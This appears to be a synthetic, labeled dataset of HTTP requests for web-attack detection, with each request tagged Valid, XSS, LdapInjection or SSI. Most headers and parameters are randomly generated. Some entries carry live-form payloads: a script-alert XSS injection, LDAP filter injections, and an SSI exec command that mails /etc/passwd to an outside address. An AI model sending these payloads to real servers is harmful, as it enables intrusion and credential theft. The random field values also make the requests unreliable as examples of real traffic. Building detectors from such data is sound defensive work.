en8heidm=cj&1RmA8W=191705&pada=an 7isesbdwsErhttpea&En=/s3y&yakqer=00194062&lxohiRlin=7281987&sonon59ehset=89YOnibitvTs0aS&dn=dmailu&o4im=H8eeo&sbclrByciae=505799&Mnt0t=77924021&eiurbseeiedrutl=e8rv&Hy9k9O6rdFS=4930&epurdd=tmang2mmm85mpU&ooaloe6=i5OgfdPut

End - Id: 6101
Start - Id: 30350
class: Valid
GET /-hallq0wlD_xJl/onret/06YL_59f2L/cltn2e/i8o5/unssfdrht67Iegtytn.jpeg?etY=46&Salakt=dmsM&goy=5&lvvI=eIOf7&nlpnu=t%24&1n=e3uaRmeni+n%25&gstdink4pVsamE=robjectt&lh=479787&sag6om6neu4o=ak0a&Q19tlinkrB4=hhr&otytnyieta=e5k&1wc9nbDaztr=dfwsf%3Detpr&l0h=learogi4FR HTTP/1.1
Host: 201.180.58.212
Connection: keep-alive
Accept: audio/basic;q=0.8, video/*;q=0.4, text/*;q=0.8
Accept-Charset: x-mac-icelandic, windows-1258;q=0.4, x-mac-turkish
Accept-Encoding: gzip;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 46.149.252.32
Cookie: rhue6ehh9dhwtoa=1?mail;iteamqcume= p;lI1PZAm0NDS=aenphpi
Cookie2: $Version="3"
Date: Sun, 14 Nov 04 22:03:58 CET
ETag: "DbXbF.n5nws-Sqt1ttB4"
Expect: 100-continue
From: aaS7di@esk6nosXr.cz
If-Modified-Since: Wed, 11 Oct 06 24:19:28 GMT
If-Unmodified-Since: Wed, 31 May 06 11:36:28 CET
If-Match: "bwbjsZRPI@bWt94pJv"
If-None-Match: "exr7G9305CUYpaWU"
If-Range: Fri, 18 Nov 05 18:14:01 CET
Max-Forwards: 1308
MIME-Version: 1.3
Pragma: 7twsIb=Dp6n
Proxy-Authorization: Basic MmZ0bGxjOnBpaXNv
Authorization: Basic U2h1aHc6cHJoRXdlZXM=
Range: 05745-,56-61
Referer: http://www.ntdtisi.uk/sibeyi/n2exr7na/rs6n.php4
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 8.6; an-mp; rv:7.2.3) Gecko/17819663
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: 0.1 13.100.108.77, 5.9 www.airan.gif, FTP/1.1 151.96.205.88
Transfer-Encoding: compress
Upgrade: anxrdn/9.4, nRovoy/2.5, p6aym/9.5, 6rc/8.0, nAhe/8.8
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 123.135.81.190
X-Serial-Number: 969767
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30350
Start - Id: 20859
class: Valid
GET /eoi/0ore/emiodnaeolThunsatNie/ylq8eadnrcilgt/itasfee5iccaid/g8beascattgeh/mail5.8NAq-u/teCrwNrmtrnhsntx.msf? HTTP/1.1
Host: www.nykto.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 186.115.77.25
Cookie: 1eulkf=hsAchc13riay>Qt;ohhM3cbrnijm=y1tssawinnt;nnQasE8rup9m=827501
Cookie2: $Version="34"
Date: Sat, 27 Oct 07 02:27:55 UTC
ETag: "BnbYQ5mwr2P6C.zMiP@"
Expect: 100-continue
From: dnCSe5st@sqeawRtsa.cz
If-Modified-Since: Fri, 16 Oct 09 05:55:33 CET
If-Unmodified-Since: Mon, 29 Dec 08 12:40:39 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Feb 04 24:37:43 UTC
Max-Forwards: 4729
MIME-Version: 8.4
Pragma: qEnn=tmayOIbs
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=e96ec373
Range: 4992-
Referer: /iwaAa/mIeiona.pdf
TE: chunked,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 3.5; el-eU; rv:8.0.6) Gecko/59067475
UA-CPU: x86
UA-Disp: 550,7756,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 691x8896
Via: 6.0 www.idOgrn.html
Transfer-Encoding: deflate
Upgrade: deqrsi/3.0
Warning: 296 214.47.11.12 "2nWtseAGip4" 
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 20859
Start - Id: 9441
class: Valid
GET /s6Job5/iy3dJqvT.gif?Srrctsidl6O=uKlBMjb&zpzhutkth=e+&d4dde=3792996&itAhptNas=67897&Uitoaee=open41&mk2m8g=06566&e9r=samilt4+etdscriptMt&crg=ssa&Xg9admin21gS=8870 HTTP/1.1
Host: www.aenaelLt.org:069
Connection: lqstr
Accept: audio/basic
Accept-Charset: euc-jp;q=0.6, hz-gb-2312;q=0.7
Accept-Encoding: 
Accept-Language: nltui-MTenau, s-vler;q=0.6, ateeotl-hio
Cache-Control: no-transform
Client-ip: 87.126.243.254
Cookie: bodyxTR4WcGA=B2a 
Cookie2: $Version="00"
Date: Tue, 29 Jun 04 13:35:41 UTC
ETag: W/"@8QA_vWMBay-vYqC"
Expect: etai1l
From: ieue@hoegnHqytl.be
If-Modified-Since: Sun, 18 Jul 04 21:38:01 UTC
If-Unmodified-Since: Sat, 30 Apr 05 09:45:28 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Oct 05 11:20:34 UTC
Max-Forwards: 04
MIME-Version: 4.1
Pragma: i=snl4c
Proxy-Authorization: uide iwlucnv=bfge1or
Authorization: Digest nonce
Range: 378353-
Referer: http://www.abgda.st/urtd/iusersl/wetrone/a1mrbtga/qaEraIn.rar
TE: trailers,gzip;q=0.7,chunked;q=0.5
Trailer: User-Agent
User-Agent: eDlK1W3o http://www.ioapsas.it
UA-CPU: Sparc
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 383x664
Via: 2.9 www.Rnrho.html
Transfer-Encoding: stbltA; nihnn=atreroi
Upgrade: 2saP/8.1, hoai/5.7, rttsrq/0.0
Warning: 339 144.218.59.163 "gnvogsawxtUq" 
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9441
Start - Id: 21955
class: Valid
GET /dxmhntyhycmpuvouah6t/huedro/SaNrreiwEmie/eIDFgPsJLfql1X89/t0MHiUXJ0QTxVk2Zj-fh/hJyafoUooy/iI.YCi/1deletev.m/euaIehn4aoconcbt/c7/a.4s/aYHlK7JW.msf? HTTP/1.0
Host: www.peairteoi.be
Connection: close
Accept: application/rtf;q=0.8, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, identity, identity;q=0.9, identity, gzip;q=0.2
Accept-Language: *
Cache-Control: e5imss=samrtve6
Client-ip: 144.206.91.198
Cookie: mol=ovAftadsooTn;0yefuqwinof=objectt$bo;LIpxO2q9ZVS=a-Nb@LER;Ns0hLcssfaoovpo=h9WiiXnaofrrwm
Cookie2: $Version="04"
Date: Fri, 07 Mar 08 11:24:03 CET
ETag: W/"etE-UwK9sn4JnTrko6y"
Expect: 100-continue
From: o5dwea@emautz6.org
If-Modified-Since: Fri, 30 Jul 04 15:35:06 GMT
If-Unmodified-Since: Wed, 30 Sep 09 19:59:55 UTC
If-Match: *
If-None-Match: "d3M5G6Py6oJrGhRS"
If-Range: Thu, 01 Jan 09 08:41:39 UTC
Max-Forwards: 2711
MIME-Version: 7.1
Pragma: a=pmk
Proxy-Authorization: Digest qop=zeTaNse
Authorization: Basic dHR2dW5lcG86YXNsd25m
Range: 81-3452
Referer: http://nCeiaes5.st/seederr6/eOCt/tntnlbn/s4twjj/7atl2k.js
TE: deflate
Trailer: Authorization
User-Agent: ghexewmo/6.6.9.4
UA-CPU: x86
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6403x304
Via: HTTP/1.3 192.42.136.70, Fwn1is/7.4 101.92.146.22, 0.9 www.dtur.png
Transfer-Encoding: identity
Upgrade: fysst/0.3
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 133.218.232.127
X-Serial-Number: 09176432061314
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21955
Start - Id: 47960
class: XSS
GET /ktresndtrhmsjhd9doto/f-RBwt/NgR/Viy1iol3AetNeN.sh?rt1lh=seEuii+&dautoexecyXn_og=%3Cxml++id+++%3D+%22+++++X+%22+++%3E%3Ca++%3E%3Cb++%3E%26lt%3Bscript++++%3E%5Balert++++%28%27gHedaaiex%27%29%3B%5D%26lt%3B%2Fscript%3E%3B%3C%2Fb+++%3E%3C%2Fa%3E%3C%2Fxml+%3E HTTP/1.0
Host: 225.186.130.99:78411
Connection: keep-alive
Accept: application/*;q=0.5, video/quicktime, video/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip, gzip;q=0.6, identity;q=0.9
Accept-Language: *
Cache-Control: max-age=94
Client-ip: 234.54.187.109
Cookie: WGO-UokpkdC=8677479;1eaiexmozpb=;e;oedntylmrse=httpaesatsrci
Cookie2: $Version="32"
Date: Fri, 26 Feb 10 11:13:04 UTC
ETag: W/"Mw_-1Tt9@rmm-RMax"
Expect: 100-continue
From: e4le@beZlsQbrdn.de
If-Modified-Since: Sun, 16 May 04 17:40:16 UTC
If-Unmodified-Since: Wed, 16 Dec 09 03:48:19 CET
If-Match: *
If-None-Match: "OiEfMBB6sHnf83S"
If-Range: *
Max-Forwards: 14
MIME-Version: 1.8
Pragma: tusvlaa='t'
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -162,92-
Referer: http://ionso3at.gov/zreehfnh/r4tn/5rfm/inCoeser/Nncanm.rar
TE: trailers
Trailer: Expect
User-Agent: 7naan6NRU/8.2
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3364x532
Via: 6.5 75.242.192.14
Transfer-Encoding: gzip
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 258 www.enaLrqsn.shtml "owbjsDoG4e" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47960
Start - Id: 4953
class: Valid
POST /ihssttA/eoEq/uK4M5Ts9.jpeg? HTTP/1.1
Content-Length: 243
Content-Language: u,cx
Content-Encoding: gzip
Content-Location: /etseszr/4koI.jsp
Content-MD5: MGh0czBGcmFhZWVUQm9pcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Jun 07 17:05:58 CET
Last-Modified: Mon, 22 Jun 09 02:57:02 CET
Host: 109.181.71.230
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 52.51.133.140
Cookie: fgw8XFRexecp=\gsreplaceautoexecorconnectgaa-or=;4nsed=lhpw hhtpassn(ea(locationda6sopt;cea4=3111464
Cookie2: $Version="357"
Date: Thu, 22 Jul 04 22:47:46 UTC
ETag: W/"mIW.MWoXwJF0w.9ANcaB"
Expect: 100-continue
From: gneIsg@soeinse9uz.cz
If-Modified-Since: Mon, 28 Jul 08 04:28:58 CET
If-Unmodified-Since: Wed, 04 Jul 07 12:49:51 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Apr 05 13:04:06 GMT
Max-Forwards: 0249
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic bm5hb3JoY2Y6emRlOW9J
Authorization: NTLM a2N0YzFPN3R0c2h3ZXJldVRhbWVoYVRJNWN1bW9pdXNhOXJkaWFyYWFyc0ZFdE8x
Range: -9,-30994,21-971
Referer: http://v3stiwrw.uk/TTmy.wav
TE: trailers
Trailer: Via
User-Agent: Mozilla/3.6 (X11; U; Solaris 7.9; si-rs; rv:0.8.5) Gecko/69013069
UA-CPU: Sparc
UA-Disp: 979,352,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6237x5879
Via: 3.3 91.153.75.250:033, FTP/8.7 www.r2ycr.htm, FTP/4.7 www.3ile8r.jpg
Transfer-Encoding: igop; orw7S=8gwn
Upgrade: fFAahd/7.2, t4Oi/2.4
Warning: 747 www.aifrDc.tiff:842 "tymzbgji" 
X-Forwarded-For: 18.33.117.239
X-Serial-Number: 3100317318115604683
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uioter=z6PJSn18qUV&szO4i=9234077&o7gHrM=twScwnettrmqpc&itncnwseyd=t&execyyIuK=ubx&Yxp0=Spn&li1xlpderpo2es=fuandr9sme+2wtps5T&ef0ess2s6rn9E4=b697C4PV4Ym&1iy=ttcoedC|- &ochs0Dki=tyxeieqXp&rt=i\includegrhnoedropWr:mlNio&Ahiq=SCh&rxzcL=twi

End - Id: 4953
Start - Id: 34525
class: Valid
POST /DlibidZwLMgm./u6/ttc5utb/rmaLtoi/soottzyumitu/Kj7Mphp@-Qi/cpzS/UhPLRwheredscriptSZ/h0AhTYcUo9xkrLeb.gif? HTTP/1.0
Content-Length: 59
Content-Language: 9atmrn
Content-Encoding: identity
Content-Location: /iethhEse/4iyr/jel5l/aSsr/hi5qadbe.avi
Content-MD5: ZWdzbmNnc3ZpVGU2c2NyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 08 Jan 09 20:03:10 CET
Last-Modified: Mon, 14 Sep 09 05:44:57 GMT
Host: 162.8.35.90
Connection: keep-alive
Accept: text/html;q=0.3, image/*
Accept-Charset: cp-936, iso-8859-8-i;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 110.110.120.247
Cookie: i9h=79;pt=Aservicesipobvstdin
Cookie2: $Version="9"
Date: Wed, 30 Sep 09 19:05:10 UTC
ETag: "g7fAL7Zn3kvuB41p6btJ"
Expect: 100-continue
From: aiiTbdt@stretps.it
If-Modified-Since: Sat, 13 Oct 07 15:58:36 UTC
If-Unmodified-Since: Tue, 14 Aug 07 11:50:47 UTC
If-Match: "yupLnJX3P2f6Xf_V5O7h"
If-None-Match: *
If-Range: Sun, 19 Feb 06 20:46:04 UTC
Max-Forwards: 68
MIME-Version: 2.4
Pragma: 9Towa7=kntri
Proxy-Authorization: Basic ZVMyZ2F0OnN1cnRldmN5
Authorization: NTLM aEFpR1YxdG5lMzVkb2VkbGRyN3RtZU5UdGV1bGx0YXhoZXJlZGU4eWh2YXJlbg==
Range: 934-
Referer: http://mabip3.com/debfNy2/icsiF/ijhhan.pdf
TE: gzip;q=0.8,trailers,trailers
Trailer: Via
User-Agent: Mozilla/3.4 (compatible; Konqueror/0.6; Win 9x; oin4dsgl9t; lfLh)
UA-CPU: MIPS
UA-Disp: 245,2195,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 066x785
Via: FTP/2.3 www.hrttD.shtml, HTTP/9.5 172.3.252.114
Transfer-Encoding: deflate
Upgrade: fju3/8.6, nsi/2.1, Fne/1.5, dessr8/5.4
Warning: 499 24.172.147.164 "idoo6ex7lm" "Fri, 25 Mar 05 19:19:41 CET"
X-Forwarded-For: 38.219.193.159
X-Serial-Number: 52771929
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rkpp2=EnEos6id9pmmkT2&erocayhc8nsioi=1715339&5gkzmeta=xamwu

End - Id: 34525
Start - Id: 28901
class: Valid
GET /c4ojW6hI/vUX1TQEgigGNz/tSzscriptR/nibdomeer.asp? HTTP/1.1
Host: 169.152.64.200
Connection: Uh4enuLn
Accept: application/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: Necika-us0Islss;q=0.5, flmtf-u;q=0.3, dxtnesa-opoors
Cache-Control: min-fresh=06634
Client-ip: 28.194.250.228
Cookie: tAst=2tmifnnfemfY;sarrRearf=ntt;ventgois=Lrsdsiazoatgumae;srNgd=636178;BlBWIsFbdcmE=8Aipn
Cookie2: $Version="5"
Date: Sat, 28 Feb 09 16:44:39 CET
ETag: "HrtiEqLqX57Uy0N9"
Expect: 100-continue
From: trrfyie@htyofoaez.ch
If-Modified-Since: Fri, 06 Jun 08 22:28:01 GMT
If-Unmodified-Since: Sun, 29 Jul 07 17:13:52 CET
If-Match: "2JQAzCy_cUbf0-CA8"
If-None-Match: *
If-Range: Fri, 31 Aug 07 16:38:45 UTC
Max-Forwards: 039
MIME-Version: 4.1
Pragma: w='ETrUo'
Proxy-Authorization: Digest uri=/qjEaKd.asp
Authorization: Basic Z3JkNmRyb3Q6cmY2NmE=
Range: 2410-,5-
Referer: http://www.bydoq.net/pislnex3/oDiv/m8to8n.swf
TE: trailers,deflate;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 4.6; ee-Bl; rv:0.3.3) Gecko/49107060
UA-CPU: MIPS
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: oexf/6.2 www.n0in.css, FTP/7.1 www.w9Lmt.css, 9.1 139.212.221.99
Transfer-Encoding: se1ooa
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 024 112.19.139.193:125 "necaihRotsrmii5Vaor" "Fri, 21 May 04 05:22:34 GMT"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 2568531119908025423
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28901
Start - Id: 37618
class: LdapInjection
POST /Eauhna.pl? HTTP/1.1
Content-Length: 55
Content-Language: pjnzPE,acrsLi1,2sb
Content-Encoding: identity
Content-Location: http://www.8tn7tb.net/8simTo.asmx
Content-MD5: bmF1TjNyamxjZVcxY3VoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 10 06:40:26 GMT
Last-Modified: Wed, 16 Jul 08 22:54:10 UTC
Host: 143.115.249.6
Connection: keep-alive
Accept: application/*, video/*;q=0.2, application/*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: ee='eytrseue'
Client-ip: 109.56.227.8
Cookie: pre7dI7ekttnt7=nleo
Cookie2: $Version="0"
Date: Thu, 29 Jan 04 24:50:38 UTC
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: tiwatv@kDh9.de
If-Modified-Since: Fri, 08 Apr 05 24:54:26 CET
If-Unmodified-Since: Wed, 20 Apr 05 23:58:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: NTLM dDhiNmVyYmFrMmJvdWVyMU9xaGl0c28wdW5lWXJldDZlN29hbmwwaWE=
Range: 9-3321,97916-131
Referer: http://stahsSt.cz/sNDg/rE2r2n/seeacy/ak0ea/ulEhis.asmx
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.1 (X11; U; SunOS sun4u 8.1; qo-ot; rv:5.7.0) Gecko/59402835
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 770x317
Via: 1.2 www.tdEnl.tiff
Transfer-Encoding: deflate
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5P@I.=")(targetfilter=(o=NetscapeRoot))

End - Id: 37618
Start - Id: 40076
class: SSI
GET /lCJyRd5@u9_M.gif?45gxboot.iniWn=+-&3esvug=%3C%21--+%23exec+cmd%3D%22%2Fbin%2Fmail++++HsmAnuigal.com+%3C+++%2Fetc%2Fpasswd%22--%3E&f7hReacti0rd=edaerduc&3fOA5lxgiframe-=8579030 HTTP/1.0
Host: www.b3dntteeie.org
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: rsodfco-yn;q=0.7, 5r-r0, mazt1ne-jaceaek;q=0.3, deiteEu-osAph;q=0.7
Cache-Control: max-stale
Client-ip: 53.190.46.19
Cookie: eiA=43;LAguYcBQ9Yib=4967007
Cookie2: $Version="642"
Date: Thu, 12 May 05 08:18:41 GMT
ETag: "6MLClxhRoy2z2nIcv"
Expect: fpetd
From: uohepreO@9Mntu.biz
If-Modified-Since: Thu, 11 Feb 10 08:25:09 UTC
If-Unmodified-Since: Sun, 19 Dec 04 11:02:49 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 178
MIME-Version: 7.5
Pragma: aoPereqI=tfla5o
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Digest nc=7AfFe9A4
Range: 4-,3-,-4
Referer: /otdmr/ads3dfo/totra/elu0y/yxse.ace
TE: trailers,trailers,deflate;q=0.7
Trailer: Transfer-Encoding
User-Agent: E2onY4 (tCNlO5D; st2Z@90)
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x680
Via: 5.6 22.105.75.198, HTTP/8.3 178.233.163.162, i0ti/5.2 65.50.237.6
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 133.223.4.65
X-Serial-Number: 9018401167222078
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40076
Start - Id: 4831
class: Valid
PUT /4gpyj0Aw_lSj6c@nUNIQ/enionre0ewegtopNgghh/4tngncto/rosihn4tcweeocjhohne/oe4ha/hdemhhwsdum08tatsa/tvSDv/vgE@MT/hM42pMCUuGCc7bj.shtml? HTTP/1.0
Content-Length: 363
Content-Language: idE7ieog
Content-Encoding: gzip
Content-Location: /et3r4H1n/isohCtn8/f3ndtrr/l5eeazTo.nsf
Content-MD5: bmhsZWF1dWFzc2xuZHRraQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Feb 06 22:38:46 GMT
Last-Modified: Fri, 18 Aug 06 04:28:20 UTC
Host: www.AtCwt.be:5
Connection: close
Accept: text/*
Accept-Charset: windows-874;q=0.6, x-mac-korean;q=0.4, windows-874;q=0.1, gb2312
Accept-Encoding: gzip;q=0.7
Accept-Language: ei5jh-j, 58ieex1t-n5nog;q=0.0, eaon-irgtnmf
Cache-Control: max-age=1515
Client-ip: 178.12.186.92
Cookie: ileiaOdhthyV=979;6xbrdw9=77xFV_Fc;elyi=o>>th;group byBTO=4108;Ercegti= >5mec4ifer;fca0Stuattsh7r=4330
Cookie2: $Version="13"
Date: Wed, 03 Nov 04 18:15:54 UTC
ETag: "_.Wi-eBBGDIz1mEb8R"
Expect: ooeanLi=w31yca;ekcitth
From: leaTmHa@pheie.net
If-Modified-Since: Wed, 14 Feb 07 24:08:17 GMT
If-Unmodified-Since: Sun, 28 Mar 10 13:28:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Jan 05 20:02:55 CET
Max-Forwards: 7
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dGVyZHFuRXNSYWVlZ2Voa3VoY3Vtd2JkOGVlZTd5ZWV5bg==
Authorization: NTLM UmFzaGxlc3Jua3VvZWQ0NTdvYTJlbnNhbWZoekxramVpYXNodml3ZW5lb2VvYXRo
Range: 43-
Referer: http://ce8sus21.de/elerhs/t7qneri7/eexiHa/ndrt/bli8a.wmn
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: bimBteroF2eo0B
UA-CPU: 68000
UA-Disp: 0621,287,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9174x0420
Via: 4.1 www.i3jh.jpg, 2.8 124.103.223.200
Transfer-Encoding: gzip
Upgrade: pltw/8.5, i0og/2.1, mto/5.0, khh/6.6, 54e/7.6
Warning: 256 www.esor2sne.html "tuocRrfoedT9hanfoqeo" "Sat, 03 Feb 07 19:15:16 UTC"
X-Forwarded-For: 92.118.218.21
X-Serial-Number: 408211072514512
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

eheoaizE=1&czt6i=4tgsektceazt&BqKgYdJQgOls=tfh4t&scriptb@DMPcX=50&UjSwTDEbgsoundVv7=598944002&sGE8NVT9like1=jstiagroup by3IelToa&2aun=803&leeLc=huMZmR&mdlttotsanault=8heie&cHi=earencesrYjanull8@]ond&7pbh1h0ehiteu1d=8Dea?esxdr&Ntcxcs=t Iscriptts1ci@iaa &@~&body0CNNQA6acceptFWX=39189378&q0toeawezbsudod=L4eynLessdlos&iu4hzt=tserviceshssid8 sgbgsoundT

End - Id: 4831
Start - Id: 12180
class: Valid
GET /nsb3a/4pme4pev/eiF4/hiypqm.cgi?ggSsock_streamHnWJyR.=03&toyszmuLtisrghi=0410568&clyba1ei=%273pss&iomc02my6s=dbf&R9Lli=9&GpBJkhtacces.dNhNk=hen-&enyeliets=456214&Etnt8aaege8iszo=led5dndgne%27&a60euee7has=27&homebM_nodeTrF=217531&mAepfeori0=6745136&childake=59039587&eOueAWiabs2ii=or%2Foa&oxhdrnatemts=s1ks1s0%3EiframeA+oaetclb&g7cNteoiuhLnrig=nl%22n56e%22+easrqs HTTP/1.0
Host: 153.200.1.45
Connection: b1noe
Accept: image/*;q=0.5, image/*, image/png;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, compress, deflate, identity
Accept-Language: *
Cache-Control: max-stale=2416
Client-ip: 73.101.25.255
Cookie: dnl=eIQWo_07XKC;lfsSfh='t;r0et=924287;RTn9ifouOtnLgL=4t
Cookie2: $Version="078"
Date: Sun, 20 Jan 08 21:26:15 UTC
ETag: "J-w@mMWx0qoLlL8"
Expect: ureQ7fow
From: 3stL@Estri.de
If-Modified-Since: Fri, 06 Feb 04 06:02:16 GMT
If-Unmodified-Since: Sat, 21 Aug 04 15:44:37 GMT
If-Match: *
If-None-Match: "FmT@w-MJ8Go.B--W"
If-Range: Thu, 27 Aug 09 24:56:02 CET
Max-Forwards: 4556
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: lert mmeei=fdhn
Authorization: Digest algorithm=MD5
Range: -242768
Referer: http://www.eefsauf.org/q5ho/dbtjutsm/0besaien.swf
TE: chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/2.7 (Windows; U; WinNT 8.1; 5e-mg; rv:8.6.3) Gecko/55636905
UA-CPU: 68000
UA-Disp: 3158,9578,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x2699
Via: FTP/9.0 www.she5.htm:21336
Transfer-Encoding: compress
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 36511935
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12180
Start - Id: 38373
class: LdapInjection
GET /naqbngirth/79selectFupdateW2%uh7NC/uelesiTie2Y/iNsOZL/wS@-k-@gpF7SFg/uVJNCjvG4qFJg/5UaO.jpeg?TeaeoraaSDs=88%29%28%26%28objectClass%3Ditvs%29%28%7C%28sn+++%3D+++l8e%29%28cn%3DIns+J*%29%29 HTTP/1.1
Host: www.Noha.uk
Connection: close
Accept: text/*
Accept-Charset: isiri-3342, big5;q=0.5, iso-8859-2;q=0.6, x-mac-ce;q=0.2, windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 41.189.98.25
Cookie: tt4hdntorrae=]vbscriptytemj;oe=-sds?t/iuhddosd7to ;owfRLttiemdcxTn=?a ;alaogvmu5=z24.n7wNXc;met=nin+\;0yxiuV-=ae  EetTnph-hu|ptha
Cookie2: $Version="9"
Date: Sun, 07 Oct 07 11:06:31 CET
ETag: "_tbcCy0@wz8M8jd"
Expect: hteo
From: frlm@ctsi1ez.ch
If-Modified-Since: Tue, 27 Jul 04 24:52:40 UTC
If-Unmodified-Since: Wed, 04 Nov 09 20:13:54 CET
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: *
If-Range: Thu, 25 Oct 07 02:09:59 CET
Max-Forwards: 8
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dGlkaVI6ZDllUnJhcg==
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -0,582766-
Referer: /iryab/ashEsi/srlaekn/owEoaf/sTglEoe.js
TE: deflate;q=0.4,chunked;q=0.1,deflate
Trailer: Referer
User-Agent: Mozilla/3.8 (X11; U; Unix 8.6; yd-md; rv:7.6.0) Gecko/51972060
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6897x261
Via: FTP/8.6 www.hvo5n.gif, baibtc/9.7 139.26.137.7
Transfer-Encoding: deflate
Upgrade: o1jc/2.3, igt/0.7, Hce/5.3, re9/4.3
Warning: 144 www.enoipEi.htm "wtoi" 
X-Forwarded-For: 0.127.43.146
X-Serial-Number: 9579642646846
